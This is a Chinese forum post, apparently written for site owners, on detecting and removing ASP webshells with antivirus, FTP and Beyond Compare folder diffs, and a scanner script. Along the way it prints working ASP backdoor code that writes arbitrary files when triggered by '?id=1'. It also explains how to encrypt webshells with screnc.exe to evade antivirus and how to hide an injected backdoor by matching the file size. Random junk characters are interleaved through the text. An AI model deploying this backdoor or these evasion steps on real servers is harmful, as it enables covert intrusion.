 TA的每日心情 | 开心
2014-7-28 21:47 |
|---|
签到天数: 2 天 [LV.1]初来乍到
|
网上的一些防范asp木马的教程都基于提前防范的基础之上,例如:禁止FSO,利用NTFS限制用户目录等等。这些方法虽然有效,但是都是基于提前防范的,而且对于一般的买空间来做网站的朋友来说显然不可能。我在这里讲讲如何有效的发现web空间中的asp木马并清除。 2 w* k; D0 q! x. y
/ o0 ?2 @) n. l) x5 D3 W# `' U
通过帮朋友整理web空间摸索出了一些技巧,这些技巧还挺管用,不敢独享,拿出来共享。 ) P- a; r+ u9 P! }! J* |4 `# v) e
- L P9 L/ p: }! ]7 R3 r k% K' P5 ~7 I一.技巧1:杀毒软件查杀
) Y( l& [# t& ~: O) M- B |8 L" a* M1 g0 g1 J9 Z
一些朋友可能在成功得到上传权限之后,上传的asp木马是一些非常有名的asp木马,例如:cmdasp,海洋顶端木马,这些木马虽然功能强大,但是早已经被杀毒软件列入了黑名单,所以利用杀毒软件对web空间中的文件进行扫描,可以有效的发现并清除这些有名的asp木马。这是我利用瑞星杀毒软件在web目录中查杀到的一个asp木马,木马标注为:Script.ASP.Rootkit.10.a,在瑞星的网站上搜索一下,可以知道这就是海洋顶端木马。 3 Z9 z' K5 B" ^! C- ^- I
! O+ f& y* ~$ N$ Z1 t4 J利用这种方法,可以有效的对抗一些小菜上传的asp木马,效果明显。 2 q3 M$ G# m% X+ w) T( R
3 m3 p: S/ y+ O3 n9 S. z
二.技巧2:FTP客户端对比 : w2 l4 s; R7 K
0 y( l* a" o& z; d. J& K5 u$ S上面的方法虽然对菜鸟入侵者比较管用,但是遇到稍微有点意识的入侵者来说,几乎失去效果,因为他们完全可以对asp木马进行伪装,加密,使其躲藏杀毒软件,这样的手法比较多,我个人比较喜欢微软开发个的一个asp加密小工具:screnc.exe,screnc.exe是一款ASP加密程序,加密的程式比较安全,使代码完全改变,使用也非常简单。只需要在命令下输入:
5 P, {' R4 A# n7 W* `1 K1 W m6 d" O5 s
screnc.exe,得到帮助命令:Usage: screnc [/?] [/f] [/xl] [/l ScriptLanguage] [/e DefaultExtension] 〈source〉 〈destination〉,根据提示,只需要输入:screnc.exe 要加密的asp木马名 输出的asp木马名,就可以完成加密伪装。 ' o+ H" [4 t- b. ^: r& u( |; N
5 R; `1 p9 P5 [" x. n, b0 V经过加密之后,记事本打开查看,可以看到标签:〈% ……%〉,〈script〉〈/script〉
! U8 C% ^) M+ Z' B; u' C. t. [& @3 N" S+ y: W
等标签内的代码成为一些“乱码”,而杀毒软件查杀asp木马是通过搜索关键字来查杀,着阿姨能够显然就躲过查杀。
( c# ]- }' V/ m3 @9 b. N1 \; t g! ~2 c, ~
盛大官方网站被黑,挂的网页木马代码就是利用screnc.exe来加密的,过了好几天才被发现,可见加密伪装手法的高超。 q+ e: Z' L9 ~+ x, S
" U/ G+ a( V! ]1 N所以要采取另外的措施对付这种加密伪装的asp木马,我们可以利用一些FTP客户端软件(例如cuteftp,FlashFXP)提供的文件对比功能,通过对比FTP的中的web文件和本地的备份文件,发现是否错出可疑文件。
) F* o% r5 e- D- g. ]7 p/ N3 ?# ]. W8 v( K" z# ~
这里以FlashFXP进行操作讲解。
! b# @8 d& G7 d1 Q
( H' ?! G- k8 P9 X' i5 s7 S步骤1:打开FlashFXP,在左边窗口中跳转到本地web备份文件目录,在右边的FTP窗口中跳转到web目录下。
, \4 W9 r' Y$ b+ b3 L& |
n5 _% W7 b/ k0 b步骤2:点工具栏中的“工具”,选择其中的“比较文件夹命令”,即可进行对比文件夹,速度非常快。
3 j& o3 I9 j9 I, I' ~, [
2 p+ g1 p, I( B0 A我们可以清楚的看到196个对象被过滤,在FTP空间中多出了这样几个asp文件:.asp,2005.asp等,这十有八九就是入侵者留下的asp后门,打开确认一下即可。 8 X9 w# e- m5 l- @! F# n
三.技巧3:用Beyond Compare 2进行对比
' E* ^% ]5 o& L6 g) C7 I3 u0 Q# f w0 Y/ g; j; _
上面的利用FTP客户端对比文件的方法,虽然有效,但是遇到渗透入文件的asp木马,那就无能为力了,这里介绍一款渗透性asp木马,可以将代码插入到指定web文件中,平常情况下不会显示,只有使用触发语句才能打开asp木马,其隐蔽性非常高。代码如下:
! X3 d% c' D% T! _ h8 n- F
+ c, B( O# {+ _- i" k0 y/ T〈%
. c# o5 R# T% i, k2 L' l, ^/ {5 i. F4 ^7 i" b, _
on error resume next
4 j0 g. ?4 ^ j5 c6 r
$ B$ f! R5 ~1 A2 sid=request("id")
9 q. D' W& T6 ^2 ?# O
0 F5 y1 R$ W4 |" T. yif request("id")=1 then & J3 V, Z- F- m6 h8 j
, }: B7 c; `. |# Z' n( Y3 c! S% Rtestfile=Request.form("name") D* B' _: c# _
, P$ _" C* \4 j" e! b2 Wmsg=Request.form("message") * |$ [1 q! c& V" J+ a8 m% q& j# y
0 Z+ x0 x2 V4 F- V+ Z) D
set fs=server.CreatObject("scripting.filesystemobject") + X. W' y' l) l& S$ O" k6 ?& V+ @9 c
' ^7 p7 K( g+ K4 E. j h, M0 T: k
set thisfile=fs.openTestFile(testfile,8,True,0)
- Y4 B8 |$ C, \ d. `" P
, }$ e/ A% G4 u# Y, Fthisfile.Writeline(""&msg&"") , |0 _& y! F" k+ ]: ~# _
7 Z w; @5 w' {) j* ?; x$ X) B) v2 G
thisfile.close
Q$ K; V. m9 l! \
3 m- i Y" a0 g% W I( F% g, uset fs=nothing , D) \6 U" {/ c
$ t. B2 Q4 T ~2 h2 U9 s
%〉 ; p; \; L* F+ }9 ^1 q
' q1 Z, `' k9 U; J5 Y6 k
〈from method="post" Action="保存"?id=1〉 % d8 f: d0 L9 n" T) e/ `
: k, F! [2 B1 f1 V
〈input type="text" size="20" name="Name" ' c2 y+ @0 m6 i/ U+ K1 J3 r8 _
: x) ]0 ]) M+ x# l, |: HValue=〈%=server.mappath("XP.ASP")%〉〉
% H' O# X' ]$ E N, u0 t+ T; u" g
〈textarea name="Message" class=input〉
/ |+ C9 l6 f: d4 P$ J S7 h; p* z! L7 k i/ c/ V5 k
7 K; g1 O& D' n o( E" q2 C
〈/textarea〉 2 y9 N; t4 {/ X( @
+ o9 u2 L3 C: U" o( j$ l) M+ M! S
〈input type="Submit" name="send" Value="生成" + ]7 B1 w5 u9 [. Y# l0 R
' E; D, d' _4 y( c; c
class=input〉 6 t& I# S0 H0 z. a q9 A
0 C4 L9 H- M- Z/ i: N" y" ~- A〈/from〉 2 X( W/ h6 c8 [! T- |& G
& x4 e4 o7 _) v1 `! c7 |2 r
〈%end if%〉 o o; V) h6 W: x' e- M
8 i/ u8 ~" ^$ k' |$ |2 M7 H8 ?* W
注意:在修改目标主机的web文件时,要注意这样的文件修改后没有效果,即含有类似于:〈!--#include file="inc/conn.asp"--〉这样的文件包含命令,这样的代码存在时,加入asp代码后根本不会显示出脚本后门,但是脚本后门代码不会影响原文件的显示和功能。 - X5 B3 u; T3 R* s% Z. K1 @
- ~. S4 ?- G# Y1 Q' T假如已经对目标服务器www.target.com下的一个editor_InsertPic.asp文件进行了修改,插入了脚本后门代码,那么打开的方式是:www. target..com/editor_InsertPic.asp?id=1,注意后门的字符?id=1,有了这些字符,才能保证脚本后门显示出来!普通情况下打开www. target..com/editor_InsertPic.asp?id=1,是不会露出破绽的。 " h& k5 v8 ?, |( T$ A2 O% O
! O2 M0 x" [+ [6 q
这招真是asp木马放置中非常狠的,如果遇到这样的情况,该怎么办?我们可以利用一款专业的文件对比工具Beyond Compare 2来完成木马的查找。
+ x- E. J% G1 w0 H- Z8 X5 J, n! C0 L
- T& o9 w) T0 W0 b5 _% L$ Y- q0 vBeyond Compare 2一款不可多得的专业级的文件夹和文件对比工具。使用它可以很方便的对比出两个文件夹或者文件的不同之处。并把相差的每一个字节用颜色加以表示,查看方便。并且支持多种规则对比。% k: n/ c4 z( |" G) T: C4 ~; V
$ @; @4 m! F8 O# U1 P$ O看我来利用它完成渗透性asp木马的查找。
$ F0 A y7 |) b$ W5 B+ E1 e# }. O8 v1 V
步骤1:打开Beyond Compare 2,点工具栏中的“比较任务”,选择其中的选项:新建,在“比较模式”中选择“比较两个文件夹”。进入一下步,选择需要对比的两个文件夹路径,即备份过的网站文件以及从FTP上下载的网站文件,再在下面的“文件过滤器”中选择“包括所有文件”。在“比较范围”中选择“文件大小”。设置完毕即可开始比较。 6 e2 _' N# d& R$ H3 W# B
8 Q5 P9 D- [! B; V! a% D. n5 _" K步骤2:比较完毕,软件界面左右两边分别显示了比较的结果,从中可以很容易找到哪个目录多出了什么文件。 + Q, B* _# ~! g5 r( s/ T" Y
5 `, \' z2 a( S T; c* C
步骤3:文件名相同,但是大小不同的文件,会被软件用另外的颜色标注出来,选择上它们,然后选择工具栏的“操作”中的“比较内容”功能,即可展开两个文件的详细内容,从中我们可以看到FTP端的文件被插入了渗透asp木马。这下很容易找到了吧! 7 R( Y; P" n1 E' ^% g" J4 t8 d- ^
p( v# P8 q# n- ?- ~9 B
7 J+ C, s1 h! T+ P- f# U7 x四.技巧4:利用组件性能找asp木马 : u- z1 X3 A4 L) s* S* ^1 }3 N% ~8 e; ]. y
$ [6 A- M" F6 @% e! E, l3 i9 h
上面分门别类的介绍了几种asp木马的放置与查杀技巧,一般的菜鸟,老鸟恐怕都是利用上面的方法来放置asp木马吧!所以可以有效的对抗web空间中上传的asp木马。这下可以高枕无忧了吧?呵呵!先别急,还有一种BT的asp木马放置方法,你可能很难想到,放置思路是这样的:在目标web空间中寻找一个不常用的,比较合适的asp文件,打开它对其进行代码精简,然后再将渗透asp木马的代码插入,再对其进行精简,直至与原本的文件大小一样。最后利用加密伪装的手法对其进行处理。这样就彻底练就了一个绝对隐藏的asp木马后门,一般的入侵者恐怕很难做到这一点,因为要精简代码的同时还要保证asp木马的功能不会错误。
& U. c0 C( ]. V5 H5 K# |* |: F5 N2 k5 ]
如果你恰恰遇到一个这样的入侵者,那么该怎么才能查出被他放置的asp木马呢?你可能认为这已经不太可能了,呵呵!完全可能,看我拿出宝贝来:思易asp木马追捕。
' a# J$ t1 R, S: O4 a7 F6 ~! ~4 q: a1 ?) t
它是一款专门检索各种asp文件所带功能的asp软件,通过搜索asp木马含有的特殊字符,以及搜索利用变量创建对象及静态对象建立的代码,来找出可能含有疑点的asp文件,从而有效的防范asp木马。 * ]% d; S L9 p/ }' R( C6 U
6 b3 D2 Y6 y* }使用非常简单,只需要将文件asplist2.0.asp上传到web空间下,然后在地址拦中打开,就完成了所有asp文件的检索。可以看出它是通过查找各个asp文件的功能来确认是否为asp木马,这些功能也都是asp木马常用的:FSO,WS,SHELL,XML等等。
+ B) m: H- P, J U
! l4 f( Y ]# a# C4 i4 S J6 I: }一般的web文件很少具有这样的功能,只有那些可恶的asp木马才具有,可以看到一些文件具备了相当多的功能,这时候,就可以打开这些文件来确认是否是asp木马,非常有效。
- I4 F! t7 _; a0 D$ P+ L: D
6 D: K( z9 N+ p3 |) i大家在查找web空间的asp木马时,最好几种方法结合起来,这样就能有效的查杀被隐藏起来的asp木马。 |
|
/1 
IP卡
狗仔卡
发表于 2009-4-17 08:32:46
QQ好友和群
QQ空间
腾讯微博
腾讯朋友
收藏
分享
顶
踩
转发到微博
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
抢沙发
千斤顶
显身卡
楼主